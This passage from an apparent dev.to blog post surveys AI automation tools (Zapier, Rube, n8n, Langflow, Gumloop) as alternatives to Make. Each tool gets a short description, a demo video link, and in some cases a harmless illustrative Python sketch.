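&lt;p&gt;Conceptually, a Zap is just “when X happens in app A, do Y in app B.” Here’s that trigger → action chain sketched in plain Python (the apps and functions are hypothetical; Zapier wires this up for you with zero code):&lt;/p&gt;

```python
# Trigger: pretend a new form submission just arrived (hypothetical app)
def new_form_submission():
    return {"email": "jane@example.com", "message": "Need a demo"}

# Action: pretend we post a notification to Slack (hypothetical app)
def send_slack_message(payload):
    return f"New lead: {payload['email']}"

# The "Zap": the trigger's output feeds straight into the action
event = new_form_submission()
notification = send_slack_message(event)
print(notification)  # New lead: jane@example.com
```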

&lt;p&gt;Sounds cool? Here's a quick tutorial to get hands-on with Zapier. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/JtdUgJGI_Oo"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  2. &lt;a href="https://rube.app/" rel="noopener noreferrer"&gt;Rube&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ MCP server that connects your AI tools with 500+ apps.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fltv1ujprz1xqhcd82sdv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fltv1ujprz1xqhcd82sdv.png" alt="Rube.app"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you’ve come across the term &lt;strong&gt;MCP&lt;/strong&gt; before, you know it stands for &lt;a href="https://modelcontextprotocol.io/introduction" rel="noopener noreferrer"&gt;Model Context Protocol&lt;/a&gt;. In simple terms, it’s a bridge that lets AI models talk to external apps and services, giving them both data and the ability to take action.&lt;/p&gt;
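&lt;p&gt;Under the hood, MCP is JSON-RPC 2.0: the client lists the server’s tools and invokes one with a &lt;code&gt;tools/call&lt;/code&gt; request. Here’s a sketch of what a single call looks like on the wire (the tool name and arguments are made up for illustration):&lt;/p&gt;

```python
import json

# One MCP tool invocation as a JSON-RPC 2.0 request. A hosted MCP server
# like Rube receives this, runs the real API call, and returns the result.
request = {
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {
        "name": "GMAIL_SEND_EMAIL",  # hypothetical tool exposed by the server
        "arguments": {"to": "team@example.com", "subject": "Hello from MCP"},
    },
}
print(request["method"])  # tools/call
```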

&lt;p&gt;Rube acts as a &lt;strong&gt;hosted MCP server&lt;/strong&gt; that bundles integrations with popular tools like Slack, Gmail, Facebook, and many more. Instead of setting up servers and wiring APIs yourself, you instantly unlock access to &lt;strong&gt;over 500 apps&lt;/strong&gt; right inside your AI chat tools.&lt;/p&gt;

&lt;p&gt;To see what’s available, you can browse the &lt;a href="https://rube.app/marketplace" rel="noopener noreferrer"&gt;Rube marketplace&lt;/a&gt;, which lists all the supported apps.&lt;/p&gt;

&lt;p&gt;Getting started is simple:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Install Rube on your preferred platform, or&lt;/li&gt;
&lt;li&gt;Sign up on the &lt;a href="https://rube.app/" rel="noopener noreferrer"&gt;web app&lt;/a&gt;, connect an app, and test it directly in your browser.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv5odjsztv7joasgm5kc3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv5odjsztv7joasgm5kc3.png" alt="Rube installation"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here’s a quick demo that shows Rube in action 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/ZFI83b0TB3o"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  3. &lt;a href="https://n8n.io/" rel="noopener noreferrer"&gt;n8n&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ The world’s most popular open-source no-code automation platform.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh1m5hn9f2x3v17bjadq3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh1m5hn9f2x3v17bjadq3.png" alt="n8n.io"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;n8n is an open-source platform that makes it easy to create automation workflows, AI agents, and integrations without heavy coding. You get a &lt;strong&gt;visual canvas&lt;/strong&gt; where you drag and connect nodes to link apps, APIs, and logic together.&lt;/p&gt;

&lt;p&gt;The best part? It’s completely &lt;strong&gt;free and open-source&lt;/strong&gt;. You can run it on your own machine, deploy it in the cloud, or use their hosted version if you want a plug-and-play option.&lt;/p&gt;

&lt;p&gt;With n8n, you can:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Connect hundreds of apps and databases right out of the box&lt;/li&gt;
&lt;li&gt;Add JavaScript or Python when you need advanced custom logic&lt;/li&gt;
&lt;li&gt;Build one-off automations or scale up to production-grade workflows&lt;/li&gt;
&lt;li&gt;Automate almost anything that exposes an API&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In short, if there’s an API, chances are you can automate it with n8n. 🤯&lt;/p&gt;
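&lt;p&gt;And if you do drop down to code, an n8n Code node receives the previous node’s items and returns new items, each wrapped under a &lt;code&gt;json&lt;/code&gt; key. Here’s that item-in/item-out shape sketched as stand-alone Python (inside n8n itself, this body runs within the node):&lt;/p&gt;

```python
# Mimics what an n8n Code node does: transform the incoming items and pass
# them on. n8n items are dicts wrapped under a "json" key.
def code_node(items):
    return [{"json": {**item["json"], "processed": True}} for item in items]

incoming = [{"json": {"id": 1}}, {"json": {"id": 2}}]
outgoing = code_node(incoming)
print(len(outgoing))  # 2
```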

&lt;p&gt;If you want to see what’s possible, check out this quick walkthrough from &lt;a href="https://youtube.com/@NetworkChuck" rel="noopener noreferrer"&gt;NetworkChuck&lt;/a&gt;. It’s a great introduction to how powerful n8n can be 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/ONgECvZNI3o"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  4. &lt;a href="https://langflow.org/" rel="noopener noreferrer"&gt;Langflow&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Low-code AI builder for agentic and RAG applications.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Finbpou1ttmr784nfhnuy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Finbpou1ttmr784nfhnuy.png" alt="Langflow"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Langflow gives you a drag-and-drop visual interface that lets you build complex AI workflows without writing every line of code.&lt;/p&gt;

&lt;p&gt;Under the hood, it’s powered by Python and gives you full access to customize components, hook into APIs, or integrate vector stores.&lt;/p&gt;

&lt;p&gt;You can:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Quickly iterate using visual flows and reusable components&lt;/li&gt;
&lt;li&gt;Orchestrate multi-agent systems with conversation control and retrieval logic&lt;/li&gt;
&lt;li&gt;Turn your flows into APIs, JSON exports, or even MCP servers for integration&lt;/li&gt;
&lt;li&gt;Support major LLMs, databases, and tools out of the box&lt;/li&gt;
&lt;li&gt;As always, there's a lot more...&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Take a look at the Langflow &lt;a href="https://docs.langflow.org/" rel="noopener noreferrer"&gt;docs&lt;/a&gt; to learn more.&lt;/p&gt;

&lt;p&gt;Here's a quick intro video to Langflow 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/l-t65yQ9sKA"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  5. &lt;a href="https://gumloop.com/" rel="noopener noreferrer"&gt;Gumloop&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ A no-code platform that lets you build AI workflows using drag-and-drop nodes.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffmm8ajij68u44seducc6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffmm8ajij68u44seducc6.png" alt="Gumloop"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Gumloop works similarly to Rube or n8n by giving you a visual canvas where you link building blocks (called “nodes”) to design workflows.&lt;/p&gt;

&lt;p&gt;You place triggers, logic, API calls, AI prompts, or integrations on a canvas, connect them, and deploy. It handles orchestration behind the scenes.&lt;/p&gt;

&lt;p&gt;What you can do with Gumloop:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Build workflows that fetch data, call AI models, transform it, and push results to apps like Google Sheets, Slack, CRMs, etc.&lt;/li&gt;
&lt;li&gt;Use &lt;strong&gt;subflows&lt;/strong&gt; so you can reuse chunks of logic inside bigger flows.&lt;/li&gt;
&lt;li&gt;Integrate with services like Slack, Salesforce, Airtable, Outlook, GitHub, Google, and more.&lt;/li&gt;
&lt;li&gt;Use its built-in AI features to scrape websites, analyze content, generate text, etc., all inside flows.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Want to see it in action? Here’s a demo showing a real workflow built using Gumloop 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/QFc7jXZ2pdE"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;blockquote&gt;
&lt;p&gt;If you know of any other useful AI automation tools that I haven't mentioned in this article, please share them in the comments section below. 👇🏻&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Those are your top 10 Make alternatives for &lt;strong&gt;AI automation&lt;/strong&gt; in 2025, and that wraps up this article. Thank you so much for reading! 🫡&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff9406elawoiefpa83dlu.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff9406elawoiefpa83dlu.gif" alt="Bye Bye GIF"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>productivity</category>
      <category>ai</category>
      <category>programming</category>
    </item>
  </channel>
</rss>
